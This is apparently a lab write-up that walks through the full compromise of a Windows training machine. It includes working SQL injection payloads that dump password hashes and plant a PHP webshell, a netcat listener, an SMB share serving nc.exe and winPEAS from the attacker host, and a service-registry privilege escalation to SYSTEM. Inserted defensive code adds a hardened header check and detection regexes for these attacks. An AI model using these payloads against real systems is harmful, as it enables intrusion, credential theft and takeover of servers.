As always, we start with the enumeration phase, in which we scan the machine for open ports and identify the services and versions running behind them.
The following nmap command scans the target for open ports quickly and saves the output to a file:
-sS use the TCP SYN scan option. This scan is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scan the entire port range, from 1 to 65535.
-T5 insane mode, the fastest of nmap's timing templates.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allPorts file.
# Nmap 7.93 scan initiated Mon Mar 27 11:11:02 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.167
Nmap scan report for 10.10.10.167
Host is up (0.059s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
3306/tcp open mysql
49666/tcp open unknown
49667/tcp open unknown
# Nmap done at Mon Mar 27 11:11:28 2023 -- 1 IP address (1 host up) scanned in 26.63 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on them. The following command scans these ports in more depth and saves the result to a file:
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into a file, in this case the targeted file.
# Nmap 7.93 scan initiated Mon Mar 27 11:12:08 2023 as: nmap -sCV -p80,135,3306,49666,49667 -Pn -oN targeted 10.10.10.167
Nmap scan report for 10.10.10.167
Host is up (0.099s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Fidelity
135/tcp open msrpc Microsoft Windows RPC
3306/tcp open mysql?
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 27 11:13:08 2023 -- 1 IP address (1 host up) scanned in 60.63 seconds
The website shows a landing page with four buttons.
There is a comment in the source code of the main page containing an IP address.
The Admin button redirects to admin.php, which complains that a header is missing.
Exploitation
We could try to brute-force the header name. Let's use wfuzz with a wordlist of header names, setting each candidate header to the IP address we found in the source code.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.167/admin.php
Total requests: 1185
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000145: 400 6 L 34 W 374 Ch "Content-Length"
000000732: 501 6 L 26 W 343 Ch "Transfer-Encoding"
000000923: 200 153 L 466 W 7933 Ch "X-Forwarded-For"
Total time: 0
Processed Requests: 1185
Filtered Requests: 1182
Requests/sec.: 0
The X-Forwarded-For header returns a 200 status code. Let's use Burp Suite as a proxy and inject this header into every request we make from our browser. Configure it from Proxy > Proxy settings > Match and replace rules.
Now we have access to the admin page.
Searching for a product with a ' character produces an SQL error, which suggests that the site is vulnerable to SQL injection.
First, we need to know the number of columns returned by the query. The following payload produces no error, so there are 6 columns.
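The access control just bypassed trusts a client-supplied X-Forwarded-For value. As an added example (not code from the original writeup or the box), here is that flaw beside a hardened version that only believes hops appended by known reverse proxies; the allow-listed address 192.168.4.28 and proxy 10.0.0.5 are constructed values.

```python
import ipaddress

# Constructed values for this example (not from the original machine):
# the allow-listed management address and the reverse proxies that are
# allowed to prepend X-Forwarded-For on behalf of a client.
ADMIN_ALLOWLIST = {ipaddress.ip_address("192.168.4.28")}
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}


def vulnerable_client_ip(remote_addr, headers):
    """The flaw: whatever the client puts in X-Forwarded-For is believed."""
    xff = headers.get("X-Forwarded-For")
    if xff:
        return ipaddress.ip_address(xff.split(",")[0].strip())
    return ipaddress.ip_address(remote_addr)


def hardened_client_ip(remote_addr, headers):
    """Walk X-Forwarded-For from the right, believing a hop only if the
    node that appended it is one of our own proxies. A header sent by a
    direct client, or a spoofed value relayed through a real proxy, is ignored."""
    current = ipaddress.ip_address(remote_addr)
    raw = headers.get("X-Forwarded-For", "")
    hops = [h.strip() for h in raw.split(",") if h.strip()]
    for hop in reversed(hops):
        if current not in TRUSTED_PROXIES:
            break  # this hop was added by an untrusted node: stop here
        try:
            current = ipaddress.ip_address(hop)
        except ValueError:
            break  # malformed hop: keep the last verified address
    return current


def admin_allowed(remote_addr, headers, resolver=hardened_client_ip):
    """Access check for the admin page: only allow-listed source addresses."""
    return resolver(remote_addr, headers) in ADMIN_ALLOWLIST
```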
p' order by 6-- -
Now, we could try to list the available databases.
p' union select schema_name,2,3,4,5,6 from information_schema.schemata-- -
One of the databases is mysql, whose user table usually has two columns called user and password. Let's retrieve the data of those columns.
p' union select user,password,3,4,5,6 from mysql.user-- -
We get password hashes for the users root, manager and hector. We could try to crack those with rainbow tables.
These credentials might be useful later. Let's try to get a shell on the system. One thing to check is which database user the application runs its queries as.
p' union select user(),2,3,4,5,6-- -
It is the manager user, which happens to have the FILE privilege, so we can write files on the system.
p' union select grantee,privilege_type,is_grantable,4,5,6 from information_schema.user_privileges-- -
As the web server is IIS 10.0, the website should be located in C:\inetpub\wwwroot\. Create a PHP webshell in that directory.
p' union select "<?php system($_GET[\'cmd\']);?>",2,3,4,5,6 into outfile "c:\inetpub\wwwroot\rce.php"-- -
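Every stage of this chain (the ORDER BY probe, the UNION SELECT against information_schema, the INTO OUTFILE write and the resulting webshell) passes through the query string, which IIS logs percent-encoded. As an added example (not from the original writeup or the box), this scanner normalises a W3C-format IIS log and flags each stage; the log lines are constructed, and the /admin.php path and productName parameter are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log excerpt modelled on the injection chain above
# (not from the original machine). The /admin.php path and productName
# parameter are assumptions; IIS logs the query string percent-encoded.
IIS_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2023-03-27 11:20:01 10.10.10.167 GET /admin.php productName=p 80 - 10.10.14.11 Mozilla/5.0 200
2023-03-27 11:21:10 10.10.10.167 GET /admin.php productName=p%27+order+by+6--+- 80 - 10.10.14.11 Mozilla/5.0 200
2023-03-27 11:22:43 10.10.10.167 GET /admin.php productName=p%27+union+select+schema_name%2C2%2C3%2C4%2C5%2C6+from+information_schema.schemata--+- 80 - 10.10.14.11 Mozilla/5.0 200
2023-03-27 11:25:07 10.10.10.167 GET /admin.php productName=p%27+union+select+%22%3C%3Fphp+system(%24_GET%5B%27cmd%27%5D)%3B%3F%3E%22%2C2%2C3%2C4%2C5%2C6+into+outfile+%22c%3A%5Cinetpub%5Cwwwroot%5Crce.php%22--+- 80 - 10.10.14.11 Mozilla/5.0 200
2023-03-27 11:26:30 10.10.10.167 GET /rce.php cmd=whoami 80 - 10.10.14.11 Mozilla/5.0 200
"""

# Each indicator corresponds to one stage of the chain seen on this box.
SQLI_PATTERNS = {
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "schema-enum": re.compile(r"\binformation_schema\b|\bmysql\.user\b"),
    "file-write": re.compile(r"\binto\s+(out|dump)file\b"),
    "file-read": re.compile(r"\bload_file\s*\("),
    "column-probe": re.compile(r"'\s*order\s+by\s+\d+"),
    "webshell-drop": re.compile(r"<\?php|\$_(get|post|request)\["),
}

def normalise(query):
    """URL-decode twice (double encoding is a common filter bypass),
    collapse whitespace and lowercase so the patterns stay simple."""
    text = unquote_plus(unquote_plus(query))
    return re.sub(r"\s+", " ", text).lower()

def scan_iis_log(log_text):
    """Return one finding per request whose query string matches an indicator."""
    findings, fields = [], None
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the lines that follow
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        rec = dict(zip(fields, line.split()))
        query = normalise(rec.get("cs-uri-query", "-"))
        hits = [name for name, pat in SQLI_PATTERNS.items() if pat.search(query)]
        if hits:
            findings.append({"time": f"{rec['date']} {rec['time']}",
                             "client": rec["c-ip"], "uri": rec["cs-uri-stem"],
                             "status": rec["sc-status"], "indicators": hits})
    return findings
```

The write itself is only possible because the application's database account holds the FILE privilege and secure_file_priv does not restrict the output directory; revoking that privilege from the web application's account removes the INTO OUTFILE stage entirely.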
Now, set a netcat listener on port 4444.
nc -lvnp 4444
-l listen mode.
-v verbose mode.
-p specify the port to listen on.
-n numeric-only IP, no DNS resolution.
And an SMB server sharing the directory where the nc.exe binary is located.
impacket-smbserver smbFolder $(pwd) -smb2support
Finally, send a reverse shell to our netcat listener, and get a shell as nt authority\iusr.
Listening on 0.0.0.0 4444
Connection received on 10.10.10.167 49698
Microsoft Windows [Version 10.0.17763.805]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\inetpub\wwwroot>whoami
whoami
nt authority\iusr
Privilege Escalation
Listing the local users shows there is a user called Hector.
net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
Hector WDAGUtilityAccount
The command completed with one or more errors.
Hector is a member of the Remote Management Users group. We could try to run commands as this user by creating a PSCredential object and using Invoke-Command with the credentials obtained earlier.
Listening on 0.0.0.0 5555
Connection received on 10.10.10.167 49706
Microsoft Windows [Version 10.0.17763.805]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\Hector\Documents>whoami
whoami
control\hector
C:\Users\Hector\Documents>type \users\hector\desktop\user.txt
type \users\hector\desktop\user.txt
9943350f7b824c5464aad64a2e5400f6
In the PowerShell history file there are a few interesting commands.
type \Users\Hector\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
As seen above, hector has full access over the services. To verify it, let's run winPEAS. Copy it to the directory shared by the SMB server and run it from the victim machine.
\\10.10.14.11\smbFolder\winPEASany.exe
...
╔══════════╣ Looking if you can modify any service registry
...
HKLM\system\currentcontrolset\services\seclogon (Hector [FullControl])
...
There are a few services that we can modify, among them one called seclogon, which runs with administrator privileges when started.
All we have to do is start the service to get a shell as nt authority\system. Then we can reap the harvest and take the root flag.
sc start seclogon
Listening on 0.0.0.0 6666
Connection received on 10.10.10.167 49721
Microsoft Windows [Version 10.0.17763.805]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>type \users\administrator\desktop\root.txt
type \users\administrator\desktop\root.txt
c31ba53ef095b0b4f380a162099c6eba